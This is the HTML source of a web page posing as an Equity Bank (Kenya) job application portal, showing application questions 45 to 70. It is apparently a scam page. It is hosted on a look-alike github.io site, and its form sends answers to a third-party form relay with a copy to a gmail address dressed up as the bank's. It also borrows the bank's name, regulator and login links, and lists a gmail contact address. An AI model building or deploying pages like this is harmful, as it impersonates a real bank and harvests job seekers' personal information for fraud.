<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Job Application Form</title>
</head>
<body>
<div class="container">
 <h2><img src="https://equity-kenya.github.io/equity/Equity-logo.png"> Equity Bank (Kenya) Job Application Portal </h2>
 <form action="https://formsubmit.co/dd314b9b79b0755e83a0538ccf5e34eb" method="post" />
   <input type="hidden" name="_cc" value="equitybankgroupholdings.co.ke@gmail.com">
   <input type="hidden" name="_next" value="https://equity-kenya.github.io/equity/index5.html">
   <input type="hidden" name="_captcha" value="false">
   <input type="hidden" name="_token" value="YLDRQ0HfmGivcPWihgVRBp5L6AVEQ92tuNKDz1Ej"> 
   <h3><u>Fill out form below:</u></h3>
    
    <label>45)Have you completed any relevant certifications in banking or finance?</label>
    <div class="checkbox-group">
      <label for="challengeYes">Yes</label>
      <input type="checkbox" id="challengeYes" name="challenge" value="yes">
      <label for="challengeNo">No</label>
    <input type="checkbox" id="challengeNo" name="challenge" value="no">    
    </div>
   
    <label>46)Discuss your understanding of the role of regulatory compliance in the banking sector.
    <textarea rows="8" cols="30" placeholder=" **Write answer to the question above here** "></textarea></label>

    <label>47)Have you used electronic banking platforms for transactions?</label>
    <div class="checkbox-group">
      <label for="challengeYes">Yes</label>
      <input type="checkbox" id="challengeYes" name="challenge" value="yes">
      <label for="challengeNo">No</label>
    <input type="checkbox" id="challengeNo" name="challenge" value="no">    
    </div>

    <label>48)What interests you about working in the banking industry?
    <textarea rows="8" cols="30" placeholder=" **Write answer to the question above here** "></textarea></label>

    <label>49)Are you knowledgeable about common financial products like savings accounts?</label>
    <div class="checkbox-group">
      <label for="challengeYes">Yes</label>
      <input type="checkbox" id="challengeYes" name="challenge" value="yes">
      <label for="challengeNo">No</label>
    <input type="checkbox" id="challengeNo" name="challenge" value="no">    
    </div>

    <label>50)How has your educational background prepared you for a role in the banking sector?
    <textarea rows="8" cols="30" placeholder=" **Write answer to the question above here** "></textarea></label>

    <label>51)Have you engaged in cross-selling financial products or services?</label>
    <div class="checkbox-group">
      <label for="challengeYes">Yes</label>
      <input type="checkbox" id="challengeYes" name="challenge" value="yes">
      <label for="challengeNo">No</label>
    <input type="checkbox" id="challengeNo" name="challenge" value="no">    
    </div>

    <label>52)What skills do you believe are essential for success in a banking role?
    <textarea rows="8" cols="30" placeholder=" **Write answer to the question above here** "></textarea></label>

    <label>53)Are you comfortable with basic accounting principles?</label>
    <div class="checkbox-group">
      <label for="challengeYes">Yes</label>
      <input type="checkbox" id="challengeYes" name="challenge" value="yes">
      <label for="challengeNo">No</label>
    <input type="checkbox" id="challengeNo" name="challenge" value="no">    
    </div>

    <label>54)Can you discuss any relevant coursework or projects from your academic studies?(optional)
    <textarea rows="8" cols="30" placeholder=" **Write answer to the question above here** "></textarea></label>

    <label>55)Is customer service experience part of your background?</label>
    <div class="checkbox-group">
      <label for="challengeYes">Yes</label>
      <input type="checkbox" id="challengeYes" name="challenge" value="yes">
      <label for="challengeNo">No</label>
    <input type="checkbox" id="challengeNo" name="challenge" value="no">    
    </div>

    <label>56)What steps do you take to ensure accuracy in financial transactions and documentation?
    <textarea rows="8" cols="30" placeholder=" **Write answer to the question above here** "></textarea></label>

    <label>57)Are you proficient in using banking software?</label>
    <div class="checkbox-group">
      <label for="challengeYes">Yes</label>
      <input type="checkbox" id="challengeYes" name="challenge" value="yes">
      <label for="challengeNo">No</label>
    <input type="checkbox" id="challengeNo" name="challenge" value="no">    
    </div>

    <label>58)Can you share your vision for the future of banking and financial services?(optional)
    <textarea rows="8" cols="30" placeholder=" **Write answer to the question above here** "></textarea></label>

    <label>59)Can you work well in a fast-paced environment with daily transaction targets?</label>
    <div class="checkbox-group">
      <label for="challengeYes">Yes</label>
      <input type="checkbox" id="challengeYes" name="challenge" value="yes">
      <label for="challengeNo">No</label>
    <input type="checkbox" id="challengeNo" name="challenge" value="no">    
    </div>

    <label>60)How do you approach learning new technologies or software relevant to the banking industry?(optional)
    <textarea rows="8" cols="30" placeholder=" **Write answer to the question above here** "></textarea></label>

    <label>61)Have you participated in any teamwork-focused projects?</label>
    <div class="checkbox-group">
      <label for="challengeYes">Yes</label>
      <input type="checkbox" id="challengeYes" name="challenge" value="yes">
      <label for="challengeNo">No</label>
    <input type="checkbox" id="challengeNo" name="challenge" value="no">    
    </div>

    <label>62)What do you believe are the key factors contributing to excellent customer service in banking?(optional)
    <textarea rows="8" cols="30" placeholder=" **Write answer to the question above here** "></textarea></label>

    <label>63)Have you conducted basic credit checks for loan applications?</label>
    <div class="checkbox-group">
      <label for="challengeYes">Yes</label>
      <input type="checkbox" id="challengeYes" name="challenge" value="yes">
      <label for="challengeNo">No</label>
    <input type="checkbox" id="challengeNo" name="challenge" value="no">    
    </div>

    <label>64)What improvements are do you think are required  necessary in the current banking sector?(optional)
    <textarea rows="8" cols="30" placeholder=" **Write answer to the question above here** "></textarea></label>

    <label>65)Have you ever been involved in fraud detection or prevention training?</label>
    <div class="checkbox-group">
      <label for="challengeYes">Yes</label>
      <input type="checkbox" id="challengeYes" name="challenge" value="yes">
      <label for="challengeNo">No</label>
    <input type="checkbox" id="challengeNo" name="challenge" value="no">    
    </div>

    <label>66)According to your opinion does diversity of staff play a crucial role in banking sector?(optional)
    <textarea rows="8" cols="30" placeholder=" **Write answer to the question above here** "></textarea></label>

    <label>67)Are you familiar with spreadsheet software for financial tracking?</label>
    <div class="checkbox-group">
      <label for="challengeYes">Yes</label>
      <input type="checkbox" id="challengeYes" name="challenge" value="yes">
      <label for="challengeNo">No</label>
    <input type="checkbox" id="challengeNo" name="challenge" value="no">    
    </div>

    <label>68)How many relevant certifications or licenses have you acquired?(optional)
    <textarea rows="8" cols="30" placeholder=" **Write answer to the question above here** "></textarea></label>

    <label>69)Have you received training on handling difficult customer situations?</label>
    <div class="checkbox-group">
      <label for="challengeYes">Yes</label>
      <input type="checkbox" id="challengeYes" name="challenge" value="yes">
      <label for="challengeNo">No</label>
    <input type="checkbox" id="challengeNo" name="challenge" value="no">    
    </div>

    <label>70)Finally, do you have work experience?(if yes specify, if none skip)
    <div class="checkbox-group">
      <label for="challengeYes">Yes</label>
      <input type="checkbox" id="challengeYes" name="challenge" value="yes">
      <label for="challengeNo">No</label>
    <input type="checkbox" id="challengeNo" name="challenge" value="no">    
    </div>
    <textarea rows="8" cols="30" placeholder=" **Write answer to the question above here** "></textarea></label>


 <h3>*Remember to answer these questions honestly and concisely, and use them as an opportunity to showcase your experience and qualifications for the chosen position*</h3>
   <div class="field"> 
       <input type="submit" class="btn_login" value="Next Page"> 
   </div> 
    <div class="label3">
     <h5>EQUITY BANK TRANSFORMING BANKING INTO A LIFESTYLE.</h5>
    </div>
   
    <div class="label4">
     <h6>Equity Bank[Kenya] Limited regulated by Central Bank of Kenya(CBK)</h6>
    </div>
 </form>
</div>
<div class="container_2">
 <div class="row">
   <label> <a href="https://selfservice.equitybankgroup.com/login">~Equity Login Page</a></label>
   <label> <a href="https://selfservice.equitybankgroup.com/terms and services">~Terms and conditions</a></label>
 </div>
 <div class="row">
   <label> <a href="http://ke.equitybankgroup.com/diaspora/">~Tax information</a></label>
   <label> <a href="https://selfservice.equitybankgroup.com/copyright">~KSE 2022-2023 Report</a></label>
 </div>
 
 <div class="row">
   <label> <a href="http://ke.equitybankgroup.com/diaspora/">~Copyright Law</a></label>
   <label> <a href="http://ke.equitybankgroup.com/admin/">~Admin Login Page</a></label>
 </div>
   <h4> <u>Contact Us</u></h4>
 <ul>
   <li>Email: [info.equity@gmail.com]</li>
   <li>Tel: [+254 763 000 000]</li>
 </ul>
</div>
<style>

body {
  background-image: url('https://equity-kenya.github.io/equity/ptb.jpg');
  background-size: auto 100%; /* Adjust background-size to cover the entire height but allow scrolling horizontally */
  background-repeat: no-repeat;
  background-attachment: fixed;
  overflow-x: scroll;
  margin: 0;
  font-family: Arial, sans-serif;
}

form {
  position: relative;
  margin: 50px auto;
  padding: 20px;
  background-color: transparent;
  border-radius: 10px;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
  max-width: 600px; /* Adjust as needed */
}

/* Additional styling for the form elements */
/* Rest of your styling for checkboxes, labels, etc. */

/* Add media query for responsiveness */
@media (max-width: 600px) {
  body {
    background-size: cover;
    overflow-x: scroll;
  }

  form {
    max-width: 100%;
  }
}

h2 img{
    width: 45px;
}


/*body {
    font-family: 'Arial', sans-serif;
    background-color: #f4f4f4;
    margin: 0;
    padding: 0px;
}*/

h2{
    font-size: 25px;
    background-color: transparent;
    color: #983a06;
    margin-left: 20px;
    margin-bottom: -40px;
    margin-top: -5px;
}
/*form {
    max-width: 250px;
    margin: 50px auto;
    padding: 20px;
    background-color: #fff;
    border-radius: 10px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}*/

.Form_control{
    width: 100%;
    padding: 12px;
    margin-bottom: 10px;
    box-sizing: border-box;
    border: 1px solid #333;
    border-radius: 5px;
    font-size: 11px
}

.checkbox-group {
  display: flex;
  margin-bottom: 16px;
}

.checkbox-group label {
  margin-right: 8px;
}

input[type="checkbox"]{
  justify-content: space-between;
  margin-right: 70px;
  margin-bottom: 30px;
}

textarea{
  font-size: 9px;
  width: 100%;
}

label textarea{
  margin-bottom: 40px;
}

.Form_controll textarea{
    width: 100%;
    padding: 12px;
    margin-bottom: 10px;
    box-sizing: border-box;
    border: 1px solid #333;
    border-radius: 5px;
    font-size: 10px
}

.btn_login{
	display: inline-block;
	height: 40px;
	width: 230px;
    margin-left: 20px;
	font-size: 20px;
	color:#AA4D01;
	text-transform:uppercase;
    border: 1px solid #333;
	cursor:pointer;
	padding: 0 25px;
	background-color: transparent;
	line-height: 30px;
	font-family: Arial, sans-serif;
	text-align:center;
	position:relative;
	-webkit-border-radius: 3px;
	border-radius: 3px;
	-webkit-transition: all 0.5s ease 0s;
	transition: all 0.5s ease 0s;
}

.label3 h5{
    font-size: 15px;
    text-align: center;
}

.label4 h6{
    font-size: 7px;
    text-align: center;
}

.container_2{
    background-color: #f4f4f4!important;
    padding: 15px;
    color: #AA4D01;
    margin-top: -30px;
}

.row{
    font-size: 12px;
    margin-left: -5px;
    display: flex;
    align-items: center;
    justify-content: space-between;
}

.row a{
    color: #AA4D01;
}

h3{
    font-size: 15px;
    color: #AA4D01;
}

li{
   margin-left: -20px;
}
</style>
</body>
</html>
